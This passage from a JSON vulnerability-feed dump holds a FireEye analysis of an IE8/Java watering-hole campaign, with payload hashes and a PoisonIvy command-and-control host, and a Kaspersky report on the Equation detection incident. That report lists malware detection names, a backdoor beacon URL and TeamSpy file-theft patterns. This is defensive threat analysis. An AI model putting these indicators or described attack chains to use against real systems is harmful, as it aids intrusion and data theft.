attack.\n * Takes tremendous effort to compromise websites relevant to the target group. It would require knowledge of web application security.\n * Leverages the zero-day exploits and fresh exploits.\n * Was multi-stage, and the second stage of payload is encrypted and downloaded from a 404-like response page, and is injected dynamically. Once they shut down the operation, it\u2019s hard to trace the attacker\u2019s intention.\n\n[caption id=\"attachment_1348\" align=\"alignnone\" width=\"540\"] Figure 1[/caption]\n\n**Exploit technique**\n\n****The exploit code is hosted on a hacked religious website. This site hosts both IE ([CVE-2013-1288](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1288>)) and Java exploits ([CVE-2013-0422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422>), [CVE-2011-3544](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544>)). 
On mining our database we found that the web server has a history of hosting malware. We will focus on the chain of execution for the exploit. The first part of the exploit checks the language of the browser, and constructs two separate ROP chains for English and Chinese languages as shown in Figure 2. The second part of the exploit is obfuscated and it triggers the vulnerability. Upon successful exploitation it will download a file dd.exe from the same server and execute it.\n\n[caption id=\"attachment_1349\" align=\"alignnone\" width=\"540\"] Figure 2[/caption]\n\n**Malware Payload:**\n\nThe file dd.exe (651fad35d276e5dedc56dfe7f3b5f125) is the stage 1 payload and makes the request shown in Figure 3. The response to this request is an HTML page. In the case of the Java exploit we found it serving 9ac8277b848496b28279f57cb959e2fb.\n\n[caption id=\"attachment_1352\" align=\"alignnone\" width=\"539\"] Figure 3[/caption]\n\nThe HTML page displays a page not found message repeatedly using a script on the page if opened in the browser.\n\n[caption id=\"attachment_1374\" align=\"alignnone\" width=\"554\"] Figure 4[/caption]\n\nInterestingly, the HTML page returned also contains Base64 encoded data within a script tag, which is in fact the stage 2 payload. This Base64 encoded data is decoded and written to %AppData%\\network.inf. The decoded file is read in another part of the code and is subject to further transformations. The first 68 bytes of the decoded data contain the decryption routine shown in Figure 5. It uses a rolling byte XOR decryption scheme and applies it to the data starting at offset 69. The decrypted data is position independent code, which is injected into an instance of iexplorer.exe launched in suspended state.\n\n[caption id=\"attachment_1350\" align=\"alignnone\" width=\"649\"] Figure 5[/caption]\n\nThis injected second stage payload is a Backdoor PoisonIvy RAT also discovered in other similar watering hole campaigns. 
This code attempts to connect to a remote server in Hong Kong over port 443. It uses a dynamic DNS provider with the hostname dd.tc.ikwb.com, which translates to 58.64.179.189. The server is not responding at the time of analysis. We found other domains associated with this IP address on robtex.com as shown in Figure 6.\n\n[caption id=\"attachment_1356\" align=\"alignnone\" width=\"378\"] Figure 6[/caption]\n\n**Similarity to previous watering hole campaigns:**\n\nLet us examine the techniques and code used in the current campaign and correlate it with previous attacks. It sets a cookie and forwards to the appropriate exploit page based on the version of the browser as shown in the code snippet below. This same cookie was found being set in earlier campaigns as well.\n\n` `\n\n[caption id=\"attachment_1375\" align=\"alignnone\" width=\"554\"] Figure 7[/caption]\n\nWhen we examine the Java exploit chain of execution we noticed that the code is similar and it re-uses the same naming convention, namely \u201cAppletHigh.jar\u201d and \u201cAppletLow.jar\u201d as shown in the code snippet below. The classnames and vulnerabilities used are also the same.\n\n[caption id=\"attachment_1376\" align=\"alignnone\" width=\"558\"] Figure 8[/caption]\n\nThe exploit traffic for three different campaigns is shown in Table 1. It is evident right away that there are similarities in the URI scheme and the exploit naming convention for Java attacks for the U.S. university and Chinese news site attacks. They both use AppletHigh.jar and AppletLow.jar.\n\nAs also noted by Jindrich Kubec and Eric Romang on their blog, today.swf from CFR attack was replaced by logo1229.swf. Similarly, news.html was replaced by DOITYOUR02.html and robots.txt was replaced by DOITYOUR01.txt. This establishes the similarity between the U.S. 
university attacks and the CFR attack.\n\n\n\nIn summary, the previous watering hole campaigns have the following similarities with the current attack:\n\n * The websites used for watering hole and hosting payloads are always compromised sites.\n * It sets a cookie with 1 day expiration and the name 'Somethingbbbbb'.\n * It checks the browser and its version.\n * If the browser is Internet Explorer 8, it delivers an exploit targeting IE8 (CVE-2013-1288); otherwise it triggers a Java exploit based on the Java version installed.\n * It uses similar naming conventions for exploit files. For example, if the Java version is 7 or above it serves CVE-2013-0422 through **AppletHigh.jar**; otherwise it serves CVE-2011-3544 through **AppletLow.jar**.\n * The URI patterns are similar across campaigns.\n * Similar RAT payloads were used in previous campaigns.\n\nOur very own Darien Kindlund has done a [detailed study](<http://www.issa.org/resource/resmgr/journalpdfs/feature0213.pdf>) on such premeditated watering hole attacks and mitigation strategies, which is a good read.\n\nWe want to acknowledge Microsoft\u2019s [MAPP](<http://www.microsoft.com/security/msrc/collaboration/mapp.aspx>) program for sharing intelligence with partners and helping us protect our customers.\n", "modified": "2013-03-20T17:26:00", "published": "2013-03-20T17:26:00", "id": "FIREEYE:4F902DE9FF06143FF34DC80FDBD2AC85", "href": "https://www.fireeye.com/blog/threat-research/2013/03/internet-explorer-8-exploit-found-in-watering-hole-campaign-targeting-chinese-dissidents.html", "type": "fireeye", "title": "Internet Explorer 8 Exploit Found in Watering Hole Campaign Targeting Chinese Dissidents", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2017-11-27T08:03:02", "bulletinFamily": "blog", "cvelist": ["CVE-2009-3869", "CVE-2010-0094", "CVE-2010-0188", "CVE-2010-0480", "CVE-2010-0840", "CVE-2010-0842", "CVE-2010-1297", 
"CVE-2010-3563", "CVE-2010-3653", "CVE-2010-3654", "CVE-2011-0609", "CVE-2011-0611", "CVE-2011-3400", "CVE-2011-3544", "CVE-2012-0507", "CVE-2012-0754", "CVE-2012-1723", "CVE-2012-4681", "CVE-2013-0422", "CVE-2013-0431", "CVE-2013-2171", "CVE-2013-2423"], "description": "\n\n## Background\n\nIn early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee's home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:\n\n 1. Was our software used outside of its intended functionality to pull classified information from a person's computer?\n 2. When did this incident occur?\n 3. Who was this person?\n 4. Was there actually classified information found on the system inadvertently?\n 5. If classified information was pulled back, what happened to said data after? Was it handled appropriately?\n 6. Why was the data pulled back in the first place? Is the evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n 7. What types of files were gathered from the supposed system?\n 8. Do we have any indication the user was subsequently \"hacked\" by Russian hackers and data exfiltrated?\n 9. Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n 10. 
Assuming cyberspies were able to see the screens of our analysts, what could they find on it and how could that be interpreted?\n\nAnswering these questions with factual information would allow us to provide reasonable materials to the media, as well as show hard evidence on what exactly did or did not occur, which may serve as a food for thought to everyone else. To further support the objectivity of the internal investigation we ran our investigation using multiple analysts of non-Russian origin and working outside of Russia to avoid even potential accusations of influence.\n\n## The Wall Street Journal Article\n\nThe article published in October laid out some specifics that need to be documented and fact checked. Important bullet points from the article include:\n\n * The information \"stolen\" provides details on how the U.S. penetrates foreign computer networks and defends against cyberattacks.\n * A National Security Agency contractor removed the highly classified material and put it on his home computer.\n * The data ended up in the hands of so called \"Russian hackers\" after the files were detected using Kaspersky Lab software.\n * The incident occurred in 2015 but wasn't discovered until spring of last year [2016].\n * The Kaspersky Lab linked incident predates the arrest last year of another NSA contractor, Harold Martin.\n * \"Hackers\" homed in on the machine and stole a large amount of data after seeing what files were detected using Kaspersky data.\n\n## Beginning of Search\n\nHaving all of the data above, the first step in trying to answer these questions was to attempt to identify the supposed incident. 
Since events such as what is outlined above only occur very rarely, and we diligently keep the history of all operations, it should be possible to find them in our telemetry archive given the right search parameters.\n\nThe first assumption we made during the search is that whatever data was allegedly taken, most likely had to do with the so-called Equation Group, since this was the major research in active stage during the time of alleged incident as well as many existing links between Equation Group and NSA highlighted by the media and some security researchers. Our Equation signatures are clearly identifiable based on the malware family names, which contain words including \"Equestre\", \"Equation\", \"Grayfish\", \"Fanny\", \"DoubleFantasy\" given to different tools inside the intrusion set. Taking this into account, we began running searches in our databases dating back to June 2014 (6 months prior to the year the incident allegedly happened) for all alerts triggered containing wildcards such as \"HEUR:Trojan.Win32.Equestre.*\". Results showed quickly: we had a few test (silent) signatures in place that produced a LARGE amount of false positives. This is not something unusual in the process of creating quality signatures for a rare piece of malware. To alleviate this, we sorted results by count of unique hits and quickly were able to zoom in on some activity that happened in September 2014. It should be noted that this date is technically not within the year that the incident supposedly happened, but we wanted to be sure to cover all bases, as journalists and sources sometimes don't have all the details.\n\nBelow is a list of all hits in September for an \"Equestre\" signature, sorted by least amount to most. 
You can quickly identify the problem signature(s) mentioned above.\n\nDetection name (silent) | Count \n---|--- \nHEUR:Trojan.Win32.Equestre.u | 1 \nHEUR:Trojan.Win32.Equestre.gen.422674 | 3 \nHEUR:Trojan.Win32.Equestre.gen.422683 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427692 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427696 | 4 \nHEUR:Trojan.Win32.Equestre.gen.446160 | 6 \nHEUR:Trojan.Win32.Equestre.gen.446979 | 7 \nHEUR:Trojan.Win32.Equestre.g | 8 \nHEUR:Trojan.Win32.Equestre.ab | 9 \nHEUR:Trojan.Win32.Equestre.y | 9 \nHEUR:Trojan.Win32.Equestre.l | 9 \nHEUR:Trojan.Win32.Equestre.ad | 9 \nHEUR:Trojan.Win32.Equestre.t | 9 \nHEUR:Trojan.Win32.Equestre.e | 10 \nHEUR:Trojan.Win32.Equestre.v | 14 \nHEUR:Trojan.Win32.Equestre.gen.427697 | 18 \nHEUR:Trojan.Win32.Equestre.gen.424814 | 18 \nHEUR:Trojan.Win32.Equestre.s | 19 \nHEUR:Trojan.Win32.Equestre.x | 20 \nHEUR:Trojan.Win32.Equestre.i | 24 \nHEUR:Trojan.Win32.Equestre.p | 24 \nHEUR:Trojan.Win32.Equestre.q | 24 \nHEUR:Trojan.Win32.Equestre.gen.446142 | 34 \nHEUR:Trojan.Win32.Equestre.d | 39 \nHEUR:Trojan.Win32.Equestre.j | 40 \nHEUR:Trojan.Win32.Equestre.gen.427734 | 53 \nHEUR:Trojan.Win32.Equestre.gen.446149 | 66 \nHEUR:Trojan.Win32.Equestre.ag | 142 \nHEUR:Trojan.Win32.Equestre.b | 145 \nHEUR:Trojan.Win32.Equestre.h | 310 \nHEUR:Trojan.Win32.Equestre.gen.422682 | 737 \nHEUR:Trojan.Win32.Equestre.z | 1389 \nHEUR:Trojan.Win32.Equestre.af | 2733 \nHEUR:Trojan.Win32.Equestre.c | 3792 \nHEUR:Trojan.Win32.Equestre.m | 4061 \nHEUR:Trojan.Win32.Equestre.k | 6720 \nHEUR:Trojan.Win32.Equestre.exvf.1 | 6726 \nHEUR:Trojan.Win32.Equestre.w | 6742 \nHEUR:Trojan.Win32.Equestre.f | 9494 \nHEUR:Trojan.Win32.Equestre.gen.446131 | 26329 \nHEUR:Trojan.Win32.Equestre.aa | 87527 \nHEUR:Trojan.Win32.Equestre.gen.447002 | 547349 \nHEUR:Trojan.Win32.Equestre.gen.447013 | 1472919 \n \nTaking this list of alerts, we started at the top and worked our way down, investigating each hit as we went trying to see if there were any indications it may be 
related to the incident. Most hits were what you would think: victims of Equation or false positives. Eventually we arrived at a signature that fired a large number of times in a short time span on one system, specifically the signature \"HEUR:Trojan.Win32.Equestre.m\" and a 7zip archive (referred below as \"[undisclosed].7z\"). Given limited understanding of Equation at the time of research it could have told our analysts that an archive file firing on these signatures was an anomaly, so we decided to dig further into the alerts on this system to see what might be going on. After analyzing the alerts, it was quickly realized that this system contained not only this archive, but many files both common and unknown that indicated this was probably a person related to the malware development. Below is a list of Equation specific signatures that fired on this system over a period of approximately three months:\n\nHEUR:Trojan.Win32.Equestre.e \nHEUR:Trojan.Win32.Equestre.exvf.1 \nHEUR:Trojan.Win32.Equestre.g \nHEUR:Trojan.Win32.Equestre.gen.424814 \nHEUR:Trojan.Win32.Equestre.gen.427693 \nHEUR:Trojan.Win32.Equestre.gen.427696 \nHEUR:Trojan.Win32.Equestre.gen.427697 \nHEUR:Trojan.Win32.Equestre.gen.427734 \nHEUR:Trojan.Win32.Equestre.gen.446142 \nHEUR:Trojan.Win32.Equestre.gen.446993 \nHEUR:Trojan.Win32.Equestre.gen.465795 \nHEUR:Trojan.Win32.Equestre.i \nHEUR:Trojan.Win32.Equestre.j \nHEUR:Trojan.Win32.Equestre.m \nHEUR:Trojan.Win32.Equestre.p \nHEUR:Trojan.Win32.Equestre.q \nHEUR:Trojan.Win32.Equestre.x \nHEUR:Trojan.Win32.GrayFish.e \nHEUR:Trojan.Win32.GrayFish.f\n\nIn total we detected 37 unique files and 218 detected objects, including executables and archives containing malware associated with the Equation Group. 
Looking at this metadata during current investigation we were tempted to include the full list of detected files and file paths into current report, however, according to our ethical standards, as well as internal policies, we cannot violate our users' privacy. This was a hard decision, but should we make an exception once, even for the sake of protecting our own company's reputation, that would be a step on the route of giving up privacy and freedom of all people who rely on our products. Unless we receive a legitimate request originating from the owner of that system or a higher legal authority, we cannot release such information.\n\nThe file paths observed from these detections indicated that a developer of Equation had plugged in one or more removable drives, AV signatures fired on some of executables as well as archives containing them, and any files detected (including archives they were contained within) were automatically pulled back. At this point in time, we felt confident we had found the source of the story fed to Wall Street Journal and others. Since this type of event clearly does not happen often, we believe some dates were mixed up or not clear from the original source of the leak to the media.\n\nOur next task was to try and answer what may have happened to the data that was pulled back. Clearly an archive does not contain only those files that triggered, and more than likely contained a possible treasure trove of data pertaining to the intrusion set. It was soon discovered that the actual archive files themselves appear to have been removed from our storage of samples, while the individual files that triggered the alerts remained.\n\nUpon further inquiring about this event and missing files, it was later discovered that at the direction of the CEO, the archive file, named \"[undisclosed].7z\" was removed from storage. 
Based on the description from the analyst working on that archive, it contained a collection of executable modules, four documents bearing classification markings, and other files related to the same project. The reason we deleted those files and will delete similar ones in the future is two-fold: first, we don't need anything other than malware binaries to improve protection of our customers, and second, because of concerns regarding the handling of potential classified materials. Assuming that the markings were real, such information cannot and will not be consumed even to produce detection signatures based on descriptions.\n\nThis concern was later translated into a policy for all malware analysts, who are required to delete any potential classified materials that have been accidentally collected during anti-malware research or received from a third party. Again to restate: to the best of our knowledge, it appears the archive files and documents were removed from our storage, and only individual executable files (malware) that were already detected by our signatures were left in storage. Also, it is very apparent that no documents were actively \"detected on\" during this process. In other words, the only files that fired on specific Equation signatures were binaries, contained within an archive or outside of it. The documents were inadvertently pulled back because they were contained within the larger archive file that alerted on many Equation signatures. According to security software industry standards, requesting a copy of an archive containing malware is a legitimate request, which often helps security companies locate data containers used by malware droppers (i.e. they can be self-extracting archives or even infected ISO files).\n\n## An Interesting Twist\n\nDuring the investigation, we also discovered a very interesting twist to the story that has not been discussed publicly to our knowledge. 
Since we were attempting to be as thorough as possible, we analyzed EVERY alert ever triggered for the specific system in question and came to a very interesting conclusion. It appears the system was actually compromised by a malicious actor on October 4, 2014 at 23:38 local time, specifically by a piece of malware hidden inside a malicious MS Office ISO, specifically the \"setup.exe\" file (md5: a82c0575f214bdc7c8ef5a06116cd2a4 - for [detection coverage, see this VirusTotal link](<https://www.virustotal.com/#/file/6bcd591540dce8e0cef7b2dc6a378a10d79f94c3217bca5f05db3c24c2036340/detection>)) .\n\nLooking at the sequence of events and detections on this system, we quickly noticed that the user in question ran the above file with a folder name of \"Office-2013-PPVL-x64-en-US-Oct2013.iso\". What is interesting is that this ISO file is malicious and was mounted and subsequently installed on the system along with files such as \"kms.exe\" (a name of a popular pirated software activation tool), and \"kms.activator.for.microsoft.windows.8.server.2012.and.office.2013.all.editions\". Kaspersky Lab products detected the malware with the verdict **Backdoor.Win32.Mokes.hvl**.\n\nAt a later time after installation of the supposed MS Office 2013, the antivirus began blocking connections out on a regular basis to the URL \"http://xvidmovies[.]in/dir/index.php\". Looking into this domain, we can quickly find other malicious files that beacon to the same URL. It's important to note that the reason we know the system was beaconing to this URL is because we were actively blocking it as it was a known bad site. This does however indicate the user actively downloaded / installed malware on the same system around the same time frame as our detections on the Equation files.\n\nTo install and run this malware, the user must have disabled Kaspersky Lab products on his machine. 
Our telemetry does not allow us to say when the antivirus was disabled, however, the fact that the malware was later detected as running in the system suggests the antivirus had been disabled or was not running when the malware was run. **Executing the malware would not have been possible with the antivirus enabled**.\n\nAdditionally, there also may have been other malware from different downloads that we were unaware of during this time frame. Below is a complete list of the 121 non-Equation specific alerts seen on this system over the two month time span:\n\nBackdoor.OSX.Getshell.k \nBackdoor.Win32.Mokes.hvl \nBackdoor.Win32.Shiz.gpmv \nBackdoor.Win32.Swrort.dbq \nDangerousObject.Multi.Chupitio.a \nExploit.Java.Agent.f \nExploit.Java.CVE-2009-3869.a \nExploit.Java.CVE-2010-0094.bb \nExploit.Java.CVE-2010-0094.e \nExploit.Java.CVE-2010-0094.q \nExploit.Java.CVE-2010-0840.gm \nExploit.Java.CVE-2010-0842.d \nExploit.Java.CVE-2010-3563.a \nExploit.Java.CVE-2011-3544.ac \nExploit.Java.CVE-2012-0507.al \nExploit.Java.CVE-2012-0507.je \nExploit.Java.CVE-2012-1723.ad \nExploit.Java.CVE-2012-4681.l \nExploit.JS.Aurora.a \nExploit.MSVisio.CVE-2011-3400.a \nExploit.Multi.CVE-2012-0754.a \nExploit.OSX.Smid.b \nExploit.SWF.CVE-2010-1297.c \nExploit.SWF.CVE-2011-0609.c \nExploit.SWF.CVE-2011-0611.ae \nExploit.SWF.CVE-2011-0611.cd \nExploit.Win32.CVE-2010-0188.a \nExploit.Win32.CVE-2010-0480.a \nExploit.Win32.CVE-2010-3653.a \nExploit.Win32.CVE-2010-3654.a \nHackTool.Win32.Agent.vhs \nHackTool.Win32.PWDump.a \nHackTool.Win32.WinCred.e \nHackTool.Win32.WinCred.i \nHackTool.Win64.Agent.b \nHackTool.Win64.WinCred.a \nHackTool.Win64.WinCred.c \nHEUR:Exploit.FreeBSD.CVE-2013-2171.a \nHEUR:Exploit.Java.CVE-2012-1723.gen \nHEUR:Exploit.Java.CVE-2013-0422.gen \nHEUR:Exploit.Java.CVE-2013-0431.gen \nHEUR:Exploit.Java.CVE-2013-2423.gen \nHEUR:Exploit.Java.Generic \nHEUR:Exploit.Script.Generic \nHEUR:HackTool.AndroidOS.Revtcp.a \nHEUR:Trojan-Downloader.Script.Generic 
\nHEUR:Trojan-FakeAV.Win32.Onescan.gen \nHEUR:Trojan.Java.Generic \nHEUR:Trojan.Script.Generic \nHEUR:Trojan.Win32.Generic \nHoax.Win32.ArchSMS.cbzph \nKHSE:Exploit.PDF.Generic.a \nnot-a-virus:AdWare.JS.MultiPlug.z \nnot-a-virus:AdWare.NSIS.Agent.bx \nnot-a-virus:AdWare.Win32.Agent.allm \nnot-a-virus:AdWare.Win32.AirAdInstaller.cdgd \nnot-a-virus:AdWare.Win32.AirAdInstaller.emlr \nnot-a-virus:AdWare.Win32.Amonetize.fay \nnot-a-virus:AdWare.Win32.DomaIQ.cjw \nnot-a-virus:AdWare.Win32.Fiseria.t \nnot-a-virus:AdWare.Win32.iBryte.jda \nnot-a-virus:AdWare.Win32.Inffinity.yas \nnot-a-virus:AdWare.Win32.MultiPlug.nbjr \nnot-a-virus:AdWare.Win32.Shopper.adw \nnot-a-virus:Downloader.NSIS.Agent.am \nnot-a-virus:Downloader.NSIS.Agent.an \nnot-a-virus:Downloader.NSIS.Agent.as \nnot-a-virus:Downloader.NSIS.Agent.go \nnot-a-virus:Downloader.NSIS.Agent.lf \nnot-a-virus:Downloader.NSIS.OutBrowse.a \nnot-a-virus:Downloader.Win32.Agent.bxib \nnot-a-virus:Monitor.Win32.Hooker.br \nnot-a-virus:Monitor.Win32.KeyLogger.xh \nnot-a-virus:PSWTool.Win32.Cain.bp \nnot-a-virus:PSWTool.Win32.Cain.bq \nnot-a-virus:PSWTool.Win32.CredDump.a \nnot-a-virus:PSWTool.Win32.FirePass.ia \nnot-a-virus:PSWTool.Win32.NetPass.amv \nnot-a-virus:PSWTool.Win32.PWDump.3 \nnot-a-virus:PSWTool.Win32.PWDump.4 \nnot-a-virus:PSWTool.Win32.PWDump.5 \nnot-a-virus:PSWTool.Win32.PWDump.ar \nnot-a-virus:PSWTool.Win32.PWDump.at \nnot-a-virus:PSWTool.Win32.PWDump.bey \nnot-a-virus:PSWTool.Win32.PWDump.bkr \nnot-a-virus:PSWTool.Win32.PWDump.bve \nnot-a-virus:PSWTool.Win32.PWDump.f \nnot-a-virus:PSWTool.Win32.PWDump.sa \nnot-a-virus:PSWTool.Win32.PWDump.yx \nnot-a-virus:RiskTool.Win32.WinCred.gen \nnot-a-virus:RiskTool.Win64.WinCred.a \nnot-a-virus:WebToolbar.JS.Condonit.a \nnot-a-virus:WebToolbar.Win32.Agent.avl \nnot-a-virus:WebToolbar.Win32.Cossder.updv \nnot-a-virus:WebToolbar.Win32.Cossder.uubg \nnot-a-virus:WebToolbar.Win32.MyWebSearch.sv \nPDM:Trojan.Win32.Badur.a \nTrojan-Banker.Win32.Agent.kan 
\nTrojan-Downloader.Win32.Genome.jlcv \nTrojan-Dropper.Win32.Injector.jqmj \nTrojan-Dropper.Win32.Injector.ktep \nTrojan-FakeAV.Win64.Agent.j \nTrojan-Ransom.Win32.ZedoPoo.phd \nTrojan.Java.Agent.at \nTrojan.Win32.Adond.lbgp \nTrojan.Win32.Buzus.umzt \nTrojan.Win32.Buzus.uuzf \nTrojan.Win32.Diple.fygv \nTrojan.Win32.Genome.amqoa \nTrojan.Win32.Genome.amtor \nTrojan.Win32.Genome.kpzv \nTrojan.Win32.Genome.ngd \nTrojan.Win32.Inject.euxi \nTrojan.Win32.Starter.ceg \nTrojan.Win32.Swisyn.aaig \nUDS:DangerousObject.Multi.Generic \nUFO:(blocked) \nVirTool.Win32.Rootkit \nVirTool.Win32.Topo.12 \nVirus.Win32.Suspic.gen \nWMUF:(blocked)\n\n## Conclusions\n\nAt this point, we had the answers to the questions we felt could be answered. To summarize, we will address each one below:\n\n**Q1** - Was our software used outside of its intended functionality to pull classified information from a person's computer?\n\n**A1** - The software performed as expected and notified our analysts of alerts on signatures written to detect on Equation group malware that was actively under investigation. In no way was the software used outside of this scope to either pull back additional files that did not fire on a malware signature or were not part of the archive that fired on these signatures.\n\n**Q2** - When did this incident occur?\n\n**A2** - In our professional opinion, the incident spanned between September 11, 2014 and November 17, 2014.\n\n**Q3** - Who was this person?\n\n**A3** - Because our software anonymizes certain aspects of users' information, we are unable to pinpoint specifically who the user was. Even if we could, disclosing such information is against our policies and ethical standards. 
What we can determine is that the user was originating from an IP address that is supposedly assigned to a Verizon FiOS address pool for the Baltimore, MD and surrounding area.\n\n**Q4** - Was there actually classified information found on the system inadvertently?\n\n**A4** - What is believed to be potentially classified information was pulled back because it was contained within an archive that fired on Equation-specific malware signatures. Besides malware, the archive also contained what appeared to be source code for Equation malware and four Word documents bearing classification markings.\n\n**Q5** - If classified information was pulled back, what happened to said data after? Was it handled appropriately?\n\n**A5** - After discovering the suspected Equation malware source code and classified documents, the analyst reported the incident to the CEO. Following a request from the CEO, the archive was deleted from all of our systems. With the archive that contained the classified information being subsequently removed from our storage locations, only traces of its detection remain in our system (i.e. \u2013 statistics and some metadata). We cannot assess whether the data was \"handled appropriately\" (according to US Government norms) since our analysts have not been trained on handling US classified information, nor are they under any legal obligation to do so.\n\n**Q6** \u2013 Why was the data pulled back in the first place? Is there evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n\n**A6** - The information was pulled back because the archive fired on multiple Equation malware signatures. We also found no indication the information ever left our corporate networks. 
Transfer of a malware file is done with an appropriate encryption level relying on RSA+AES with an acceptable key length, which should exclude attempts to intercept such data anywhere on the network between our security software and the analyst receiving the file.\n\n**Q7** - What types of files were gathered from the supposed system?\n\n**A7** - Based on statistics, the files that were submitted to Kaspersky Lab were mostly malware samples and suspected malicious files, either stand-alone, or inside a 7zip archive. The only files stored to date still in our sample collection from this incident are malicious binaries.\n\n**Q8** - Do we have any indication the user was subsequently \"hacked\" by Russian actors and data exfiltrated?\n\n**A8** - Based on the detections and alerts found in the investigation, the system was most likely compromised during this time frame by unknown threat actors. We assess this from the fact that the user installed a backdoored MS Office 2013 illegal activation tool, detected by our products as Backdoor.Win32.Mokes.hvl. To run this malware, the user must have disabled the AV protection, since running it with the antivirus enabled would not have been possible. This malicious software is a Trojan (later identified as \"Smoke Bot\" or \"Smoke Loader\") allegedly created by a Russian hacker in 2011 and made available on [Russian underground forums](<http://xaker.name/threads/22008/>) for purchase. During the period of September 2014-November 2014, the command and control servers of this malware were registered to presumably a Chinese entity going by the name \"Zhou Lou\", from Hunan, using the e-mail address \"zhoulu823@gmail.com\". We are still working on this and further details on this malware might be made available later as a separate research paper.\n\nOf course, the possibility exists that there may have been other malware on the system which our engines did not detect at the time of research. 
Given that system owner's potential clearance level, the user could have been a prime target of nation states. Adding the user's apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands. What we are certain about is that any non-malware data that we received based on passive consent of the user was deleted from our storage.\n\n**Q9** - Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n\n**A9** - Kaspersky Lab security software, like all other similar solutions from our competitors, has privileged access to computer systems to be able to resist serious malware infections and return control of the infected system back to the user. This level of access allows our software to see any file on the systems that we protect. With great access comes great responsibility and that is why a procedure to create a signature that would request a file from a user's computer has to be carefully handled. Kaspersky malware analysts have rights to create signatures. Once created, these signatures are reviewed and committed by another group within Kaspersky Lab to ensure proper checks and balances. If there were an external attempt to create a signature, that creation would be visible not only in internal databases and historical records, but also via external monitoring of all our released signatures by third parties. Considering that our signatures are regularly reversed by other researchers, competitors, and offensive research companies, if any morally questionable signatures ever existed it would have already been discovered. 
Our internal analysis and searching revealed no such signatures as well.\n\nIn relation to Equation research specifically, our checks verified that during 2014-2016, none of the researchers working on Equation possessed the rights to commit signatures directly without having an experienced signature developer verifying those. If there was a doubtful intention in signatures during the hunt for Equation samples, this would have been questioned and reported by a lead signature developer.\n\n**Q10** - Assuming cyberspies were able to see screens of our analysts, what could they find on it and how could that be interpreted?\n\n**A10** - We have done a thorough search for keywords and classification markings in our signature databases. The result was negative: we never created any signatures on known classification markings. However, during this sweep we discovered something interesting in relation to TeamSpy research that we published earlier (for more details we recommend to check the original research at https://securelist.com/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/35520/). TeamSpy malware was designed to automatically collect certain files that fell into the interest of the attackers. They defined a list of file extensions, such as office documents (*.doc, *.rtf, *.xls, *.mdb), pdf files (*.pdf) and more. In addition, they used wildcard string pattern based on keywords in the file names, such as *pass*, *secret*, *saidumlo* (meaning \"secret\" in Georgian) and others. These patterns were hardcoded into the malware that we discovered earlier, and could be used to detect similar malware samples. We did discover a signature created by a malware analyst in 2015 that was looking for the following patterns:\n\n * *saidumlo*\n * *secret*.*\n * *.xls\n * *.pdf\n * *.pgp\n * *pass*.*\n\nThese strings had to be located in the body of the malware dump from a sandbox processed sample. 
In addition, the malware analyst included another indicator to avoid false positives: a path where the malware dropper stored dropped files: ProgramData\\Adobe\\AdobeARM.\n\nOne could theorize about an intelligence operator monitoring a malware analyst's work in the process of entering these strings during the creation of a signature. We cannot say for sure, but it is possible that, for an attacker looking for anything that could show our company in a negative light, observations like this may work as a trigger for a biased mind. Despite the intentions of the malware analyst, they could have been interpreted wrongly and used to create false allegations against us, supported by screenshots displaying these or similar strings.\n\nMany people including security researchers, governments, and even our direct competitors from the private sector have approached us to express support. It is appalling to see that accusations against our company continue to appear without any proof or factual information being presented. Rumors, anonymous sources, and lack of hard evidence spread only fear, uncertainty and doubt. We hope that this report sheds some long-overdue light to the public and allows people to draw their own conclusions based on the facts presented above. 
We are also open and willing to do more, should that be required.\n\n[ **Appendix: Analysis of the Mokes/SmokeBot backdoor from the incident](<https://securelist.com/files/2017/11/Appendix_Mokes-SmokeBot_analysis.pdf>)", "modified": "2017-11-16T10:00:34", "published": "2017-11-16T10:00:34", "href": "https://securelist.com/investigation-report-for-the-september-2014-equation-malware-detection-incident-in-the-us/83210/", "id": "SECURELIST:FA58963C07F2F288FA3096096F60BCF3", "type": "securelist", "title": "Investigation Report for the September 2014 Equation malware detection incident in the US", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:14", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2418", "CVE-2012-5089", "CVE-2013-2431", "CVE-2013-2468", "CVE-2013-2420", "CVE-2013-5889", "CVE-2013-2384", "CVE-2013-2415", "CVE-2013-5848", "CVE-2012-1711", "CVE-2013-1491", "CVE-2013-1571", "CVE-2013-5782", "CVE-2013-5846", "CVE-2012-1541", "CVE-2013-2417", "CVE-2013-0402", "CVE-2013-5818", "CVE-2013-2433", "CVE-2013-1500", "CVE-2013-2448", "CVE-2013-2416", "CVE-2013-2427", "CVE-2013-0401", "CVE-2012-5074", "CVE-2012-5073", "CVE-2012-1725", "CVE-2014-0385", "CVE-2013-2424", "CVE-2013-5878", "CVE-2013-5850", "CVE-2013-2407", "CVE-2012-1533", "CVE-2013-5778", "CVE-2013-2456", "CVE-2013-0448", "CVE-2014-0410", "CVE-2013-2436", "CVE-2013-2454", "CVE-2013-2470", "CVE-2013-1485", "CVE-2013-1479", "CVE-2013-2462", "CVE-2013-0169", "CVE-2014-0415", "CVE-2013-2414", "CVE-2012-1719", "CVE-2013-2394", "CVE-2011-3563", "CVE-2013-5870", 